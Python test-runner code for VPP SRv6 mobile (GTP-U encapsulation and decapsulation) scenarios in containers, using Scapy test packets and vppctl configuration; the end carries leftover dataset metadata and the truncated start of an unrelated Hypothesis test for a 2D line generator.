c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_request", S=1, teid=200, seq=300))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_reply(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="echo_response", S=1, teid=200, seq=300))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_error(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="error_indication", S=1, teid=200, seq=300)/
IE_TEIDI(TEIDI=65535)/IE_GSNAddress(address="1.1.1.1")/
IE_PrivateExtension(extention_value="z"))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
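# NOTE: IE_TEIDI, IE_GSNAddress and IE_PrivateExtension above are
# Scapy's GTP information elements; "extention_value" (sic) is the
# field name as Scapy spells it, so it must not be "corrected" to
# "extension_value" here.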
def test_gtp6_drop_in_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_drop_in_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d.di D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.m.gtp6.e")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "B::2", "D::2/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 1.0.0.1 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt4 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
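# NOTE: unlike the drop-in (end.m.gtp6.d.di) tests above, this variant
# uses plain end.m.gtp6.d at c1 and end.dt4 at c4, so the inner IPv4
# packet is decapsulated and looked up in an IP table at the far end
# (the trailing "2" in the end.dt4 command names the FIB table) rather
# than being re-encapsulated into GTP-U.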
def test_gtp6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 1.0.0.1 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt4 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 B::2 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt6 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ipv6_pgroute("pg0", "B::2", "2002::1/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.d D4::/64")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("set ip neighbor pg0 B::2 aa:bb:cc:dd:ee:22")
c4.vppctl_exec("sr localsid prefix D4::/64 behavior end.dt6 2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ipv6_pgroute("pg0", "B::2", "2002::1/128")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp6_dt(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c1.pg_create_interface6_name(
ifname="pg0",
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c1.pg_create_interface4_name(
ifname="pg1",
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr localsid prefix D::/64 behavior end.m.gtp6.dt46 fib-table 0 local-fib-table 0")
c1.vppctl_exec("set ip neighbor pg1 1.0.0.1 aa:bb:cc:dd:ee:22")
c1.set_ip_pgroute("pg1", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="D::2") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c1.pg_start_capture_name(ifname="pg1")
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c1.name))
for p in c1.pg_read_packets():
p.show2()
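# NOTE: this test needs only c1: pg0 injects the GTP-U packet,
# end.m.gtp6.dt46 decapsulates it (dt46 accepts an inner IPv4 or IPv6
# payload), and the bare inner packet is expected back on pg1.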
def test_gtp4_dt(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
print("Deleting the old containers...")
time.sleep(30)
print("Starting the new containers...")
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c1.pg_create_interface4_name(
ifname="pg0",
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c1.pg_create_interface4_name(
ifname="pg1",
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.dt4 fib-table 0")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c1.vppctl_exec("set ip neighbor pg1 1.0.0.1 aa:bb:cc:dd:ee:22")
c1.set_ip_pgroute("pg1", "1.0.0.1", "172.200.0.1/32")
print("Waiting...")
time.sleep(30)
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.100.0.1", dst="172.200.0.1") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c1.pg_start_capture_name(ifname="pg1")
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c1.name))
for p in c1.pg_read_packets():
p.show2()
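# NOTE: the IPv4 counterpart of the test above: traffic to
# 172.20.0.1/32 is steered into the D5:: binding SID, whose
# t.m.gtp4.dt4 behavior strips the GTP-U encapsulation and, as
# configured above, forwards the inner IPv4 packet out of pg1 via
# FIB table 0.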
def status_containers(self):
print("Instances:")
for i, name in enumerate(self.instance_names):
name = self.get_name(name)
print("\t[{}] {} - {}".format(
i, name,
"running" if self.containers.get(name) else "missing"))
print("Networks:")
for i, name in enumerate(self.network_names):
name = self.get_name(name)
print("\t[{}] {} - {}".format(
i, name,
"running" if self.networks.get(name) else "missing"))
def build_image(self):
print("VPP Path (build): {}".format(self.vpp_path))
self.containers.build(self.path, self.vpp_path)
def release_image(self):
print("VPP Path (release): {}".format(self.vpp_path))
instance = self.containers.new("release-build")
system(
"docker cp release-build:{}/vpp-package.tgz {}/".format(
self.vpp_path, self.vpp_path))
instance.rem()
self.containers.release(self.path, self.vpp_path)
system("rm -rf {}/vpp-package.tgz".format(self.vpp_path))
def vppctl(self, index, command=None):
if index >= len(self.instance_names):
return
name = self.get_name(self.instance_names[index])
self.logger.error("connecting to: {}".format(name))
self.containers.vppctl(name, command)
def bash(self, index):
if index >= len(self.instance_names):
return
name = self.get_name(self.instance_names[index])
self.logger.error("connecting to: {}".format(name))
self.containers.bash(name)
def get_args():
parser = ArgumentParser()
parser.add_argument("--verbose", choices=['error', 'debug', 'info'])
parser.add_argument('--image', choices=['debug', 'release'])
subparsers = parser.add_subparsers()
p1 = subparsers.add_parser(
"infra", help="Infrastructure related commands.")
p1.add_argument(
"op",
choices=[
'stop',
'start',
'status',
'restart',
'build',
'release'])
p1.add_argument("--prefix")
p1.add_argument("--image")
p2 = subparsers.add_parser("cmd", help="Instance related commands.")
p2.add_argument("op", choices=['vppctl', 'bash'])
p2.add_argument(
"index",
type=int,
help="Container instance index. (./runner.py infra status)")
p2.add_argument(
"--command", help="Only vppctl supports this optional argument.")
p3 = subparsers.add_parser("test", help="Test related commands.")
p3.add_argument(
"op",
choices=[
"ping",
"srv6",
# "tmap",
# "tmap_5g",
# "tmap_ipv6",
# "tmap_ipv6_5g",
"gtp4",
"gtp4_usid",
"gtp4_5g",
"gtp4_echo",
"gtp4_reply",
"gtp4_error",
"gtp4_ipv6",
"gtp4_ipv6_5g",
"gtp6_drop_in",
"gtp6_drop_in_5g",
"gtp6_drop_in_echo",
"gtp6_drop_in_reply",
"gtp6_drop_in_error",
"gtp6_drop_in_ipv6",
"gtp6_drop_in_ipv6_5g",
"gtp6",
"gtp6_5g",
"gtp6_ipv6",
"gtp6_ipv6_5g",
"gtp6_dt",
"gtp4_dt"])
args = parser.parse_args()
if not hasattr(args, "op") or not args.op:
parser.print_help(sys.stderr)
sys.exit(1)
return vars(args)
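# Illustrative invocations (the help text above already refers to this
# script as ./runner.py):
#   ./runner.py infra build                       # build the image
#   ./runner.py infra start                       # containers + networks
#   ./runner.py cmd vppctl 0 --command "show int"
#   ./runner.py test gtp6                         # run a single test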
def main(op=None, prefix=None, verbose=None,
image=None, index=None, command=None):
if verbose:
basicConfig(level=verbose_levels[verbose])
if image == 'release':
image = "srv6m-release-image"
elif image == 'debug':
image = "srv6m-image"
else:
image = "srv6m-image"
print("Target image: {}".format(image))
program = Program(image, prefix)
try:
if op == 'build':
program.build_image()
elif op == 'release':
program.release_image()
elif op == 'stop':
program.stop_containers()
elif op == 'start':
program.start_containers()
elif op == 'status':
program.status_containers()
elif op == 'vppctl':
program.vppctl(index, command)
elif op == 'bash':
program.bash(index)
elif op == 'ping':
program.test_ping()
elif op == 'srv6':
program.test_srv6()
# elif op == 'tmap':
# program.test_tmap()
# elif op == 'tmap_5g':
# program.test_tmap_5g()
# elif op == 'tmap_ipv6':
# program.test_tmap_ipv6()
# elif op == 'tmap_ipv6_5g':
# program.test_tmap_ipv6_5g()
elif op == 'gtp4':
program.test_gtp4()
elif op == 'gtp4_usid':
program.test_gtp4_usid()
elif op == 'gtp4_5g':
program.test_gtp4_5g()
elif op == 'gtp4_echo':
program.test_gtp4_echo()
elif op == 'gtp4_reply':
program.test_gtp4_reply()
elif op == 'gtp4_error':
program.test_gtp4_error()
elif op == 'gtp4_ipv6':
program.test_gtp4_ipv6()
elif op == 'gtp4_ipv6_5g':
program.test_gtp4_ipv6_5g()
elif op == 'gtp6_drop_in':
program.test_gtp6_drop_in()
elif op == 'gtp6_drop_in_5g':
program.test_gtp6_drop_in_5g()
elif op == 'gtp6_drop_in_echo':
program.test_gtp6_drop_in_echo()
elif op == 'gtp6_drop_in_reply':
program.test_gtp6_drop_in_reply()
elif op == 'gtp6_drop_in_error':
program.test_gtp6_drop_in_error()
elif op == 'gtp6_drop_in_ipv6':
program.test_gtp6_drop_in_ipv6()
elif op == 'gtp6_drop_in_ipv6_5g':
program.test_gtp6_drop_in_ipv6_5g()
elif op == 'gtp6':
program.test_gtp6()
elif op == 'gtp6_5g':
program.test_gtp6_5g()
elif op == 'gtp6_ipv6':
program.test_gtp6_ipv6()
elif op == 'gtp6_ipv6_5g':
program.test_gtp6_ipv6_5g()
elif op == 'gtp6_dt':
program.test_gtp6_dt()
elif op == 'gtp4_dt':
program.test_gtp4_dt()
except Exception:
program.logger.exception("")
rc = 1
else:
rc = 0
return rc
if __name__ == "__main__":
sys.exit(main(**get_args()))
| 32.552672 | 110 | 0.557019 | 12,347 | 84,051 | 3.635539 | 0.032721 | 0.045224 | 0.022723 | 0.030298 | 0.868762 | 0.850472 | 0.835145 | 0.82942 | 0.827883 | 0.825454 | 0 | 0.085557 | 0.284256 | 84,051 | 2,581 | 111 | 32.565285 | 0.660599 | 0.043831 | 0 | 0.755807 | 0 | 0.008161 | 0.235739 | 0.000753 | 0 | 0 | 0 | 0.000387 | 0.000628 | 1 | 0.052103 | false | 0.001883 | 0.006905 | 0.008161 | 0.084118 | 0.072819 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c478170930724a811dfa7830ebef5b7b3e5c4760 | 3,938 | py | Python | test/test_2d_line.py | BurnySc2/Python-Generators | 428263db1e75fe54e4bdb90c39262c528b878388 | ["MIT"] | null | null | null |
test/test_2d_line.py | BurnySc2/Python-Generators | 428263db1e75fe54e4bdb90c39262c528b878388 | ["MIT"] | null | null | null |
test/test_2d_line.py | BurnySc2/Python-Generators | 428263db1e75fe54e4bdb90c39262c528b878388 | ["MIT"] | null | null | null |
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import math
from hypothesis import given, settings, strategies as st
from generators_2d.generators import generate_2d_line
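# The Hypothesis tests below compare generate_2d_line against a simple
# reference model: step one unit along the dominant axis, accumulate
# the fractional slope on the other axis, and floor it at every step.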
@given(
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=-10 ** 5, max_value=10 ** 5),
st.integers(min_value=100, max_value=10 ** 5),
st.integers(min_value=-100, max_value=100),
)
def test_lines_towards_east(x0, y0, east, north):
x1, y1 = x0 + east, y0 + north
correct_result = []
m = (y1 - y0) / abs(x1 - x0)
y_new = y0
for x in range(x0, x1 + 1):
correct_result.append((x, math.floor(y_new)))
y_new += m
function_result = list(generate_2d_line(x0, y0, x1, y1))
assert correct_result == function_result
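# Worked example of the reference model: for (0, 0) -> (4, 2),
# m = 2 / 4 = 0.5, so y_new takes 0, 0.5, 1.0, 1.5, 2.0, and flooring
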